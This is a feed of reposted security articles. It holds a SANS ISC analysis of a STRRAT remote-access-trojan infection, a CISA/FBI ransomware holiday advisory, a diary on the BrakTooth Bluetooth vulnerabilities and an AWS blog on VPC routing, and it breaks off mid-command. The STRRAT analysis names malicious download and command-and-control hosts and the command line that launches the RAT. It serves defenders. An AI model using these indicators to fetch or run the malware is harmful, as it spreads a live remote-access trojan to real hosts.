STRRAT: a Java-based RAT that doesn't care if you have Java, (Wed, Sep 1st)

This post was originally published on this site

Introduction

STRRAT was discovered earlier this year as a Java-based Remote Access Tool (RAT) that does not require a preinstalled Java Runtime Environment (JRE).  It has been distributed through malicious spam (malspam) during 2021.  Today's diary reviews an infection generated using an Excel spreadsheet discovered on Monday, 2021-08-30.

During this infection, STRRAT was installed with its own JRE environment.  It was part of a zip archive that contained JRE version 8 update 261, a .jar file for STRRAT, and a command script to run STRRAT using JRE from the zip archive.


Shown above:  Chain of events for the STRRAT infection on Monday 2021-08-30.

The Excel spreadsheet

This Excel spreadsheet was submitted to bazaar.abuse.ch on Monday 2021-08-30.  It likely was distributed through email, since previously-documented examples like this one were distributed through email.


Shown above:  Screenshot of the spreadsheet used for the STRRAT infection.

Initial infection activity

If a victim opens the spreadsheet and enables macros on a vulnerable Windows host, the macro code generates unencrypted HTTP traffic to 54.202.26[.]55.  Testing the spreadsheet in a lab environment, we saw an HTTP GET request that returned approximately 18.7 kB of ASCII symbols with no letters or numbers.


Shown above:  First HTTP GET request and response caused by the Excel macro.

The second HTTP request to the same IP address returned a zip archive that was approximately 72.1 MB.


Shown above:  The second HTTP GET request to 54.202.26[.]55 returned a 72.1 MB zip archive.

The zip was saved under a newly-created at C:User (very close in spelling to C:Users), then the contents were extracted, and the saved zip archive was deleted.


Shown above:  Location the zip archive was saved to on the infected host.


Shown above:  Extracted contents of the zip archive include JRE, a .jar file for STRRAT, and a script to run STRRAT.


Shown above:  Version file shows JRE version 8 update 261), and sys.cmd contains script to run the STRRAT .jar file.

Infection traffic

RAT-based post-infection traffic is often easy to spot, since many RATs use non-web-based TCP ports.  Furthermore, traffic for the initial zip archive was over unencrypted HTTP.  Finally, we saw HTTPS traffic to legitimate domains from Github and maven.org that appeared to be caused by the infection process.


Shown above:  Traffic from the infection filtered in Wireshark.


Shown above:  TCP stream of post-infection traffic generated by STRRAT.

Indicators of Compromise (IOCs)

The following malware was retrieved from an infected Windows host:

SHA256 hash: f148e9a2089039a66fa624e1ffff5ddc5ac5190ee9fdef35a0e973725b60fbc9

  • File size: 71,350 bytes
  • File name: purchase order-419617892#..xlsb
  • File description: Excel spreadsheet with macro for STRRAT

SHA256 hash: cd6f28682f90302520ca88ce639c42671a73dc3e6656738e20d2558260c02533

  • File size: 72,050,185 bytes
  • File location: hxxp://54.202.26[.]55/esfsdghfrzeqsdffgfrtsfd.zip
  • File location: C:Userxxrrffftttb55bb.zip
  • File description: zip archive retrieved by macro from Excel spreadsheet
  • Note: This package contains Java Runtime Environment (JRE) verion 8 update 261 and a .jar file for STRRAT

SHA256 hash: 685549196c77e82e6273752a6fe522ee18da8076f0029ad8232c6e0d36853675

  • File size: 222,711 bytes
  • File location: C:Userx.jar
  • File description: STRRAT .jar file from the above zip archive
  • Run method: CMD.EXE  /C C:Userbinjava.exe -jar C:Userx.jar

The following traffic occured on an infected Windows host:

  • 54.202.26[.]55 port 80 – 54.202.26[.]55 – GET /oo
  • 54.202.26[.]55 port 80 – 54.202.26[.]55 – GET /esfsdghfrzeqsdffgfrtsfd.zip
  • port 443 – repo1.maven.org – HTTPS traffic  (not inherently malicious)
  • port 443 – github.com – HTTPS traffic  (not inherently malicious)
  • port 443 – github-releases.githubusercontent.com – HTTPS traffic  (not inherently malicious)
  • DNS query for str-master[.]pw – response: No such name
  • 105.109.211[.]84 port 1990 – idgerowner.duckdns[.]org – TCP traffic generated by STRRAT
  • port 80 – ip-api.com – GET /json/  (not inherently malicious)

Final words

This specific STRRAT infection was notable because it included JRE version 8 update 261 as part of the infection package.  Including JRE allows this Java-based RAT to run on vulnerable Windows hosts whether or not they have Java installed.

The host I used for testing had a more recent version of Java, but this sample didn't care.  It sent its own version of JRE anyway.

Fortunately, default security settings in Windows 10 and Microsoft Office should prevent this particular STRRAT infection chain.

Mass-distribution methods like malspam remain cheap and profitable for cyber criminals, so we expect to see STRRAT and other types of commonly-distributed malware in the coming months.

A pcap of the infection traffic and malware from the infected host can be found here.

Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AA21-243A: Ransomware Awareness for Holidays and Weekends

This post was originally published on this site

Original release date: August 31, 2021

Summary

Immediate Actions You Can Take Now to Protect Against Ransomware
• Make an offline backup of your data.
• Do not click on suspicious links.
• If you use RDP, secure and monitor it.
Update your OS and software.
• Use strong passwords.
Use multi-factor authentication.

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) have observed an increase in highly impactful ransomware attacks occurring on holidays and weekends—when offices are normally closed—in the United States, as recently as the Fourth of July holiday in 2021. The FBI and CISA do not currently have any specific threat reporting indicating a cyberattack will occur over the upcoming Labor Day holiday. However, the FBI and CISA are sharing the below information to provide awareness to be especially diligent in your network defense practices in the run up to holidays and weekends, based on recent actor tactics, techniques, and procedures (TTPs) and cyberattacks over holidays and weekends during the past few months. The FBI and CISA encourage all entities to examine their current cybersecurity posture and implement the recommended best practices and mitigations to manage the risk posed by all cyber threats, including ransomware.

Click here for a PDF copy of this report.

Threat Overview

Recent Holiday Targeting

Cyber actors have conducted increasingly impactful attacks against U.S. entities on or around holiday weekends over the last several months. The FBI and CISA do not currently have specific information regarding cyber threats coinciding with upcoming holidays and weekends. Cyber criminals, however, may view holidays and weekends—especially holiday weekends—as attractive timeframes in which to target potential victims, including small and large businesses. In some cases, this tactic provides a head start for malicious actors conducting network exploitation and follow-on propagation of ransomware, as network defenders and IT support of victim organizations are at limited capacity for an extended time.

  • In May 2021, leading into Mother’s Day weekend, malicious cyber actors deployed DarkSide ransomware against the IT network of a U.S.-based critical infrastructure entity in the Energy Sector, resulting in a week-long suspension of operations. After DarkSide actors gained access to the victim’s network, they deployed ransomware to encrypt victim data and—as a secondary form of extortion—exfiltrated the data before threatening to publish it to further pressure victims into paying the ransom demand.
  • In May 2021, over the Memorial Day weekend, a critical infrastructure entity in the Food and Agricultural Sector suffered a Sodinokibi/REvil ransomware attack affecting U.S. and Australian meat production facilities, resulting in a complete production stoppage.
  • In July 2021, during the Fourth of July holiday weekend, Sodinokibi/REvil ransomware actors attacked a U.S.-based critical infrastructure entity in the IT Sector and implementations of their remote monitoring and management tool, affecting hundreds of organizations—including multiple managed service providers and their customers.

Ransomware Trends

The FBI’s Internet Crime Complaint Center (IC3), which provides the public with a trustworthy source for reporting information on cyber incidents, received 791,790 complaints for all types of internet crime—a record number—from the American public in 2020, with reported losses exceeding $4.1 billion. This represents a 69 percent increase in total complaints from 2019. The number of ransomware incidents also continues to rise, with 2,474 incidents reported in 2020, representing a 20 percent increase in the number of incidents, and a 225 percent increase in ransom demands. From January to July 31, 2021, the IC3 has received 2,084 ransomware complaints with over $16.8M in losses, a 62 percent increase in reporting and 20 percent increase in reported losses compared to the same time frame in 2020.This number includes only those victims who have provided information to IC3.  The following ransomware variants have been the most frequently reported to FBI in attacks over the last month.

  • Conti
  • PYSA
  • LockBit
  • RansomEXX/Defray777
  • Zeppelin
  • Crysis/Dharma/Phobos

The destructive impact of ransomware continues to evolve beyond encryption of IT assets. Cyber criminals have increasingly targeted large, lucrative organizations and providers of critical services with the expectation of higher value ransoms and increased likelihood of payments. Cyber criminals have also increasingly coupled initial encryption of data with a secondary form of extortion, in which they threaten to publicly name affected victims and release sensitive or proprietary data exfiltrated before encryption, to further encourage payment of ransom. (See CISA’s Fact Sheet: Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches.) Malicious actors have also added tactics, such as encrypting or deleting system backups—making restoration and recovery more difficult or infeasible for impacted organizations.

Although cyber criminals use a variety of techniques to infect victims with ransomware, the two most prevalent initial access vectors are phishing and brute forcing unsecured remote desktop protocol (RDP) endpoints. Additional common means of initial infection include deployment of precursor or dropper malware; exploitation of software or operating system vulnerabilities; exploitation of managed service providers with access to customer networks; and the use of valid, stolen credentials, such as those purchased on the dark web. Precursor malware enables cyber actors to conduct reconnaissance on victim networks, steal credentials, escalate privileges, exfiltrate information, move laterally on the victim network, and obfuscate command-and-control communications. Cyber actors use this access to: 

  • Evaluate a victim’s ability to pay a ransom.
  • Evaluate a victim’s incentive to pay a ransom to: 
    • Regain access to their data and/or 
    • Avoid having their sensitive or proprietary data publicly leaked.
  • Gather information for follow-on attacks before deploying ransomware on the victim network.

Threat Hunting

The FBI and CISA suggest organizations engage in preemptive threat hunting on their networks. Threat hunting is a proactive strategy to search for signs of threat actor activity to prevent attacks before they occur or to minimize damage in the event of a successful attack. Threat actors can be present on a victim network long before they lock down a system, alerting the victim to the ransomware attack. Threat actors often search through a network to find and compromise the most critical or lucrative targets. Many will exfiltrate large amounts of data. Threat hunting encompasses the following elements of understanding the IT environment by developing a baseline through a behavior-based analytics approach, evaluating data logs, and installing automated alerting systems. 

  • Understand the IT environment’s routine activity and architecture by establishing a baseline. By implementing a behavior-based analytics approach, an organization can better assess user, endpoint, and network activity patterns. This approach can help an organization remain alert on deviations from normal activity and detect anomalies. Understanding when users log in to the network—and from what location—can assist in identifying anomalies. Understanding the baseline environment—including the normal internal and external traffic—can also help in detecting anomalies. Suspicious traffic patterns are usually the first indicators of a network incident but cannot be detected without establishing a baseline for the corporate network.
  • Review data logs. Understand what standard performance looks like in comparison to suspicious or anomalous activity. Things to look for include:
    • Numerous failed file modifications,
    • Increased CPU and disk activity,
    • Inability to access certain files, and
    • Unusual network communications.
  • Employ intrusion prevention systems and automated security alerting systems—such as security information event management software, intrusion detection systems, and endpoint detection and response.
  • Deploy honeytokens and alert on their usage to detect lateral movement.

Indicators of suspicious activity that threat hunters should look for include:

  • Unusual inbound and outbound network traffic,
  • Compromise of administrator privileges or escalation of the permissions on an account,
  • Theft of login and password credentials,
  • Substantial increase in database read volume,
  • Geographical irregularities in access and log in patterns,
  • Attempted user activity during anomalous logon times, 
  • Attempts to access folders on a server that are not linked to the HTML within the pages of the web server, and
  • Baseline deviations in the type of outbound encrypted traffic since advanced persistent threat actors frequently encrypt exfiltration.

See the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. Also review the Ransomware Response Checklist in the CISA-MS-ISAC Joint Ransomware Guide.

Cyber Hygiene Services

CISA offers a range of no-cost cyber hygiene services—including vulnerability scanning and ransomware readiness assessments—to help critical infrastructure organizations assess, identify, and reduce their exposure to cyber threats. By taking advantage of these services, organizations of any size will receive recommendations on ways to reduce their risk and mitigate attack vectors. 

Ransomware Best Practices

The FBI and CISA strongly discourage paying a ransom to criminal actors. Payment does not guarantee files will be recovered, nor does it ensure protection from future breaches. Payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of malware, and/or fund illicit activities. Regardless of whether you or your organization decide to pay the ransom, the FBI and CISA urge you to report ransomware incidents to CISA, a local FBI field office, or by filing a report with IC3 at IC3.gov. Doing so provides the U.S. Government with critical information needed to help victims, track ransomware attackers, hold attackers accountable under U.S. law, and share information to prevent future attacks.

Information Requested

Upon receiving an incident report, the FBI or CISA may seek forensic artifacts, to the extent that affected entities determine such information can be legally shared, including: 

  • Recovered executable file(s),
  • Live memory (RAM) capture,
  • Images of infected systems,
  • Malware samples, and
  • Ransom note.

Recommended Mitigations

The FBI and CISA highly recommend organizations continuously and actively monitor for ransomware threats over holidays and weekends.FBI and CISA highly recommend IT security personnel subscribe to CISA cybersecurity publications (https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?qsp=CODE_RED)—and regularly visit the FBI Internet Crime Complaint Center (https://www.ic3.gov/)—for the latest alerts.  Additionally, the FBI and CISA recommend identifying IT security employees to be available and “on call” during these times, in the event of a ransomware attack. The FBI and CISA also suggest applying the following network best practices to reduce the risk and impact of compromise.

Make an offline backup of your data.

  • Make and maintain offline, encrypted backups of data and regularly test your backups. Backup procedures should be conducted on a regular basis. It is important that backups be maintained offline as many ransomware variants attempt to find and delete or encrypt accessible backups.
  • Review your organization’s backup schedule to take into account the risk of a possible disruption to backup processes during weekends or holidays.

Do not click on suspicious links.

  • Implement a user training program and phishing exercises to raise awareness among users about the risks involved in visiting malicious websites or opening malicious attachments and to reinforce the appropriate user response to phishing and spearphishing emails.

If you use RDP—or other potentially risky services—secure and monitor.

  • Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require MFA. If RDP must be available externally, it should be authenticated via VPN.
  • Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts, log RDP login attempts, and disable unused remote access/RDP ports.
  • Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for a business purpose (e.g., RDP Transmission Control Protocol Port 3389). 
  • Disable or block Server Message Block (SMB) protocol outbound and remove or disable outdated versions of SMB. Threat actors use SMB to propagate malware across organizations.
  • Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.
  • Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established security policy.
  • Open document readers in protected viewing modes to help prevent active content from running.

Update your OS and software; scan for vulnerabilities.

  • Upgrade software and operating systems that are no longer supported by vendors to currently supported versions. Regularly patch and update software to the latest available versions. Prioritize timely patching of internet-facing servers—as well as software processing internet data, such as web browsers, browser plugins, and document readers—for known vulnerabilities. Consider using a centralized patch management system; use a risk-based assessment strategy to determine which network assets and zones should participate in the patch management program.
  • Automatically update antivirus and anti-malware solutions and conduct regular virus and malware scans.
  • Conduct regular vulnerability scanning to identify and address vulnerabilities, especially those on internet-facing devices. (See the Cyber Hygiene Services section above for more information on CISA’s free services.)

Use strong passwords.

  • Ensure strong passwords and challenge responses. Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.

Use multi-factor authentication.

  • Require multi-factor authentication (MFA) for all services to the extent possible, particularly for remote access, virtual private networks, and accounts that access critical systems. 

Secure your network(s): implement segmentation, filter traffic, and scan ports.

  • Implement network segmentation with multiple layers, with the most critical communications occurring in the most secure and reliable layer.
  • Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses. Prevent users from accessing malicious websites by implementing URL blocklists and/or allowlists.
  • Scan network for open and listening ports and close those that are unnecessary.
  • For companies with employees working remotely, secure home networks—including computing, entertainment, and Internet of Things devices—to prevent a cyberattack; use separate devices for separate activities; and do not exchange home and work content. 

Secure your user accounts.

  • Regularly audit administrative user accounts and configure access controls under the principles of least privilege and separation of duties.
  • Regularly audit logs to ensure new accounts are legitimate users.

Have an incident response plan.

  • Create, maintain, and exercise a basic cyber incident response plan that:
    • Includes procedures for response and notification in a ransomware incident and
    • Plans for the possibility of critical systems being inaccessible for a period of time.

Note: for help with developing your plan, review available incident response guidance, such as the Public Power Cyber Incident Response Playbook and the Ransomware Response Checklist in the CISA-MS-ISAC Joint Ransomware Guide.

If your organization is impacted by a ransomware incident, the FBI and CISA recommend the following actions.

  • Isolate the infected system. Remove the infected system from all networks, and disable the computer’s wireless, Bluetooth, and any other potential networking capabilities. Ensure all shared and networked drives are disconnected, whether wired or wireless.
  • Turn off other computers and devices. Power off and segregate (i.e., remove from the network) the infected computer(s). Power off and segregate any other computers or devices that share a network with the infected computer(s) that have not been fully encrypted by ransomware. If possible, collect and secure all infected and potentially infected computers and devices in a central location, making sure to clearly label any computers that have been encrypted. Powering off and segregating infected computers from computers that have not been fully encrypted may allow for the recovery of partially encrypted files by specialists.
  • Secure your backups. Ensure that your backup data is offline and secure. If possible, scan your backup data with an antivirus program to check that it is free of malware.

Additional Resources

For additional resources related to the prevention and mitigation of ransomware, go to https://www.stopransomware.gov as well as the CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide. Stopransomware.gov is the U.S. Government’s new, official one-stop location for resources to tackle ransomware more effectively. Additional resources include:

Contact Information

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. If you have any further questions related to this Joint Cybersecurity Advisory, or to request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.gov.

Revisions

  • August 31, 2021: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

BrakTooth: Impacts, Implications and Next Steps, (Tue, Aug 31st)

This post was originally published on this site

In a previous diary entry, I had written about the increasing trend of Bluetooth vulnerabilities being reported in the recent years [1]. Today, the Automated Systems SEcuriTy (ASSET) Research Group from the Singapore University of Technology and Design (SUTD) revealed the BrakTooth family of vulnerabilities in commercial Bluetooth (BT) Classic stacks for various System-on-Chips (SoC) [2]. In this diary, I will be giving a brief background on BrakTooth, highlight affected products and also discuss next steps affected users/vendors could consider.

The name BrakTooth was coined from the Norwegian word “Brak” (translates to crash in English), and “Tooth” (a hat-tip to the Bluetooth protocol). These vulnerabilities were mainly caused due to non-compliance to Bluetooth Core Specifications and their respective communication protocol layers. 13 Bluetooth devices (Bluetooth Classic versions ranging from Bluetooth 3.0 + HS to Bluetooth 5.2) from 11 different vendors were assessed. 16 new vulnerabilities were discovered, and 20 Common Vulnerability Exposures (CVE) Identifiers (IDs) were assigned (along with another 4 CVE IDs pending assignment from Intel and Qualcomm). On top of the vulnerabilities that were discovered, some devices also displayed anomalous behaviour that deviates from the Bluetooth Core Specifications [3]. The summary of vulnerabilities, anomalies, devices and patch status are outlined in Table 1 below.

Table 1: Patch Status, Vulnerabilities and SDK/Firmware Version of Affected Devices (*Contact vendor to acquire patch)
SoC/Module Vendor Bluetooth SoC Firmware/SDK Version CVE/Anomaly (A) Patch Status
Espressif Systems ESP32 esp-idf-4.4

CVE-2021-28135
CVE-2021-28136
CVE-2021-28139

A1: Accepts lower Link Manager Protocol (LMP) length

Available
Infineon (Cypress) CYW20735B1 WICED SDK 2.9.0

CVE-2021-34145
CVE-2021-34146
CVE-2021-34147
CVE-2021-34148

A2: Accepts higher LMP length
A6: Ignore encryption stop

Available*
Bluetrum Technology AB5301A Unspecified (LMP Subver. 3)

CVE-2021-34150
CVE-2021-31610

A1: Accepts lower LMP length
A2: Accepts higher LMP length

Available*
Intel AX200

Linux – ibt-12-16.ddc
Windows – 22.40.0

2 CVE IDs pending

A1: Accepts lower LMP length
A2: Accepts higher LMP length
A5: Invalid Response

Patch in progress
Qualcomm WCN3990 crbtfw21.tlv, patch 0x0002

1 CVE ID pending

A1: Accepts lower LMP length
A2: Accepts higher LMP length
A4: Ignore Role Switch Reject

Patch in progress
Zhuhai Jieli Technology AC6366C fw-AC63_BT_SDK 0.9.0

CVE-2021-34143
CVE-2021-34144

A1: Accepts lower LMP length
A2: Accepts higher LMP length

Patch in progress
Zhuhai Jieli Technology AC6925C Unspecified (LMP Subver. 12576)

CVE-2021-31611
CVE-2021-31613

A1: Accepts lower LMP length
A2: Accepts higher LMP length

Investigation in progress
Zhuhai Jieli Technology AC6905X Unspecified (LMP Subver. 12576)

CVE-2021-31611
CVE-2021-31612
CVE-2021-31613

A1: Accepts lower LMP length
A2: Accepts higher LMP length

Investigation in progress
Actions Technology ATS281X Unspecified (LMP Subver. 5200)

CVE-2021-31717
CVE-2021-31785
CVE-2021-31786

A1: Accepts lower LMP length
A2: Accepts higher LMP length

Investigation in progress
Harman International JX25X Unspecified (LMP Subver. 5063)

CVE-2021-28155

A1: Accepts lower LMP length
A2: Accepts higher LMP length

Pending
Silabs WT32i iWRAP 6.3.0 build 1149

CVE-2021-31609

A1: Accepts lower LMP length
A2: Accepts higher LMP length

Pending
Qualcomm

CSR8811/
CSR8510

v9.1.12.14

1 CVE ID pending

A1: Accepts lower LMP length
A2: Accepts higher LMP length

No fix
Texas Instruments CC2564C cc256xc_bt_sp_v1.4

CVE-2021-34149

A1: Accepts lower LMP length
A2: Accepts higher LMP length

No fix

The various patch statuses are explained as follows:

Available: The vendor has replicated the vulnerability and a patch is available.
Patch in progress: The vendor has successfully replicated the vulnerability and a patch will be available soon.
Investigation in progress: The vendor is currently investigating the security issue and is being assisted by the researchers.
Pending: The vendor hardly communicated with the researchers and the status of their investigation is unclear at best.
No fix: The vendor has successfully replicated the issue, but there is no plan to release a patch.

Utilizing the BrakTooth family of vulnerabilities, the researchers could achieve arbitrary code execution on smart home products that used ESP32 SoC, cause Denial-of-Service (DoS) attacks on laptops and smartphones, and finally induce audio products to freeze up. A preliminary examination of products listed in the Bluetooth listing indicated that over 1400 product listings were affected [4]. However, as the Bluetooth stack is likely to be shared amongst many products, there is a high possibility that many other Bluetooth products are affected by BrakTooth. As of now, the Proof-of-Concept (PoC) code is only made available to any Bluetooth semiconductor or module vendors and embargoed until the end of October 2021 (before the code is made available for the public).

How should everyone handle the usage of Bluetooth devices, especially if the devices used are affected by BrakTooth? As a start, one might want to be more aware of one’s surroundings when using Bluetooth. Since BrakTooth is based on the Bluetooth Classic protocol, an adversary would have to be in the radio range of the target to execute the attacks. As such, secured facilities should have a lower risk as compared to public areas (assuming no insiders within secured facilities). Having said that, this could also be a difficult task if an adversary manages to conceal the equipment well, though that would affect the range of Bluetooth connectivity.

For end users, it is highly recommended to check if the Bluetooth products currently being used are in Table 1. If the patches are available (or if you can contact the vendor for the patch), please apply them immediately. If the patch is in progress or if the vendor is still investigating, perhaps it would be worthwhile to watch out for any anomalous behaviour (such as the inability to reconnect to a Bluetooth connection or audio devices not responding) when Bluetooth is being in use. Turn it off (if possible) when Bluetooth is not actively in use to reduce your attack surface. Keep a close lookout for corresponding patches and update the devices when possible. If the devices used SoC where no fixes are available, it is recommended to stop using them (unless one is prepared to accept the risk of BrakTooth vulnerabilities being exploited). Finally, keep in mind that BrakTooth is not limited only to the devices tested by the researchers as the attacks apply to any Bluetooth Classic implementation. Checking just the Bluetooth chipset is not enough to confirm the existence of BrakTooth. To concretely verify that a Bluetooth device is affected by BrakTooth, users could consider obtaining the BrakTooth PoC (when it is released to public on October 31st) and test the device with it.

Organizations, governments and critical infrastructure may be using affected components as well. If stakeholders are uncertain about the extent of Bluetooth usage and the associated devices, an audit of the devices/components in use should be carried out. Following that, a risk assessment should also be conducted to assess the risk posed by BrakTooth to users or day-to-day operations. Keeping in mind the attack vector, an interim measure could very well be enhanced physical security while affected devices are patched/replaced.

Finally, for Bluetooth SoC or module vendors, it is highly recommended to contact the researchers for the PoC to test products for BrakTooth vulnerabilities [5] now. Although vendors may not be legally obliged to always keep their products secure and updated, increased adoption of Bluetooth for work and health and a rising interest in Bluetooth vulnerability research underscores the importance of such issues for consideration. In addition, as customers and users get increasingly discerning for the need of their privacy and data to be protected, it is in the vendors’ best interests to ensure product security for continued presence in the market.

The full technical details of BrakTooth can be found over here [2], and also available as a downloadable PDF file [6].

References:
[1] https://isc.sans.edu/diary/27460
[2] https://www.braktooth.com
[3] https://www.bluetooth.com/specifications/bluetooth-core-specification
[4] https://launchstudio.bluetooth.com/Listings/Search
[5] https://poc.braktooth.com
[6] https://asset-group.github.io/disclosures/braktooth/braktooth.pdf

———–
Yee Ching Tok, ISC Handler
Personal Site
Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Inspect Subnet to Subnet traffic with Amazon VPC More Specific Routing

This post was originally published on this site

Since December 2019, Amazon Virtual Private Cloud (VPC) has allowed you to route all ingress traffic (also known as north – south traffic) to a specific network interface. You might use this capability for a number of reasons. For example, to inspect incoming traffic using an intrusion detection system (IDS) appliance or to route ingress traffic to a firewall.

Since we launched this feature, many of you asked us to provide a similar capability to analyze traffic flowing from one subnet to another inside your VPC, also known as east – west traffic. Until today, it was not possible because a route in a routing table cannot be more specific than the default local route (check the VPC documentation for more details). In plain English, it means that no route can have a destination using a smaller CIDR range than the default local route (which is the CIDR range of the whole VPC). For example, when the VPC range is 10.0.0/16 and a subnet has 10.0.1.0/24, a route to 10.0.1.0/24 is more specific than a route to 10.0.0/16.

Routing tables no longer have this restriction. Routes in a routing table can have routes more specific than the default local route. You can use such more specific route to send all traffic to a dedicated appliance or service to inspect, analyze, or filter all traffic flowing between two subnets (east-west traffic). The route target can be the network interface (ENI) attached to an appliance you built or you acquired, an AWS Gateway Load Balancer (GWLB) endpoint to distribute traffic to multiple appliances for performance or high availability reasons, an AWS Firewall Manager endpoint, or a NAT gateway. It also allows to insert an appliance between a subnet and an AWS Transit Gateway.

It is possible to chain appliances to have more than one type of analysis in between source and destination subnets. For examples, you might want first to filter traffic using a firewall (AWS managed or a third-party firewall appliance), second send the traffic to an intrusion detection and prevention systems, and finally, perform deep packet inspection. You can access virtual appliances from our AWS Partner Network and AWS Marketplace.

When you chain appliances, each appliance and each endpoint have to be in separate subnets.

Let’s get our hands dirty and try this new capability.

How It Works
For the purpose of this blog post, let’s assume I have a VPC with three subnets. The first subnet is public and has a bastion host. It requires access to resources, such as an API or a database in the second subnet. The second subnet is private. It hosts the resources required by the bastion. I wrote a simple CDK script to help you to deploy this setup.

VPC More Specific Routing

For compliance reasons, my company requires that traffic to this private application flows through an intrusion detection system. The CDK script also creates a third subnet, a private one, to host a network appliance. It provides three Amazon Elastic Compute Cloud (Amazon EC2) instances : the bastion host, the application instance and the network analysis appliance. The script also creates a NAT gateway allowing to bootstrap the application instance and to connect to the three instances using AWS Systems Manager Session Manager (SSM).

Because this is a demo, the network appliance is just a regular Amazon Linux EC2 instance configured as an IP router. In real life, you’re most probably going to use either one of the many appliances provided by our partners on the AWS Marketplace, or a Gateway Load Balancer endpoint, or a Network Firewall.

Let’s modify the routing tables to send the traffic through the appliance.

Using either the AWS Management Console, or the AWS Command Line Interface (CLI), I add a more specific route to the 10.0.0.0/24 and 10.0.1.0/24 subnet routing tables. These routes point to eni0, the network interface of the traffic-inspection appliance.

Using the CLI, I first collect the VPC ID, Subnet IDs, routing table IDs, and the ENI ID of the appliance.

VPC_ID=$(aws                                                    
    --region $REGION cloudformation describe-stacks             
    --stack-name SpecificRoutingDemoStack                       
    --query "Stacks[].Outputs[?OutputKey=='VPCID'].OutputValue" 
    --output text)
echo $VPC_ID

APPLICATION_SUBNET_ID=$(aws                                                                      
    --region $REGION ec2 describe-instances                                                      
    --query "Reservations[].Instances[] | [?Tags[?Key=='Name' && Value=='application']].NetworkInterfaces[].SubnetId" 
    --output text)
echo $APPLICATION_SUBNET_ID

APPLICATION_SUBNET_ROUTE_TABLE=$(aws                                                             
    --region $REGION  ec2 describe-route-tables                                                  
    --query "RouteTables[?VpcId=='${VPC_ID}'] | [?Associations[?SubnetId=='${APPLICATION_SUBNET_ID}']].RouteTableId" 
    --output text)
echo $APPLICATION_SUBNET_ROUTE_TABLE

APPLIANCE_ENI_ID=$(aws                                                                           
    --region $REGION ec2 describe-instances                                                      
    --query "Reservations[].Instances[] | [?Tags[?Key=='Name' && Value=='appliance']].NetworkInterfaces[].NetworkInterfaceId" 
    --output text)
echo $APPLIANCE_ENI_ID

BASTION_SUBNET_ID=$(aws                                                                         
    --region $REGION ec2 describe-instances                                                     
    --query "Reservations[].Instances[] | [?Tags[?Key=='Name' && Value=='BastionHost']].NetworkInterfaces[].SubnetId" 
    --output text)
echo $BASTION_SUBNET_ID

BASTION_SUBNET_ROUTE_TABLE=$(aws 
 --region $REGION ec2 describe-route-tables 
 --query "RouteTables[?VpcId=='${VPC_ID}'] | [?Associations[?SubnetId=='${BASTION_SUBNET_ID}']].RouteTableId" 
 --output text)
echo $BASTION_SUBNET_ROUTE_TABLE

Next, I add two more specific routes. One route sends traffic from the bastion public subnet to the application private subnet through the appliance network interface.  The second route is in the opposite direction to route replies. It routes more specific traffic from the application private subnet to the bastion public subnet through the appliance network interface.  Confused? Let’s look at the following diagram:

VPC More Specific Routing

First, let’s modify the bastion routing table:

aws ec2 create-route                                  
     --region $REGION                                 
     --route-table-id $BASTION_SUBNET_ROUTE_TABLE     
     --destination-cidr-block 10.0.1.0/24             
     --network-interface-id $APPLIANCE_ENI_ID

Next, let’s modify the application routing table:

aws ec2 create-route                                  
    --region $REGION                                  
    --route-table-id $APPLICATION_SUBNET_ROUTE_TABLE  
    --destination-cidr-block 10.0.0.0/24              
    --network-interface-id $APPLIANCE_ENI_ID

I can also use the Amazon VPC Console to make these modifications. I simply choose the “Bastion” routing tables and from the Routes tab and click Edit routes.MSR : Select a routing table

I add a route to send traffic for 10.0.1.0/24 (subnet of the application) to the appliance ENI (eni-055...).MSR : create a route

The next step is to define the opposite route for replies, from the application subnet send traffic to 10.0.0.0/24 to the appliance ENI (eni-05...).  Once finished, the application subnet routing table should look like this:

MSR : Final route table

Configure the Appliance Instance
Finally, I configure the appliance instance to forward all traffic it receives. Your software appliance usually does that for you. No extra step is required when you use AWS Marketplace appliances or the instance created by the CDK script I provided for this demo. If you’re using a plain Linux instance, complete these two extra steps:

1. Connect to the EC2 appliance instance and configure IP traffic forwarding in the kernel:

sysctl -w net.ipv4.ip_forward=1
sysctl -w net.ipv6.conf.all.forwarding=1

2. Configure the EC2 instance to accept traffic for destinations other than itself (known as source/destination check) :

APPLIANCE_ID=$(aws --region $REGION ec2 describe-instances                     
     --filter "Name=tag:Name,Values=appliance"                                 
     --query "Reservations[].Instances[?State.Name == 'running'].InstanceId[]" 
     --output text)

aws ec2 modify-instance-attribute --region $REGION     
                         --no-source-dest-check        
                         --instance-id $APPLIANCE_ID

Test the Setup
The appliance is now ready to forward traffic to the other EC2 instances.

If you are using the demo setup, there is no SSH key installed on the bastion host. Access is made through AWS Systems Manager Session Manager.

BASTION_ID=$(aws --region $REGION ec2 describe-instances                      
    --filter "Name=tag:Name,Values=BastionHost"                               
    --query "Reservations[].Instances[?State.Name == 'running'].InstanceId[]" 
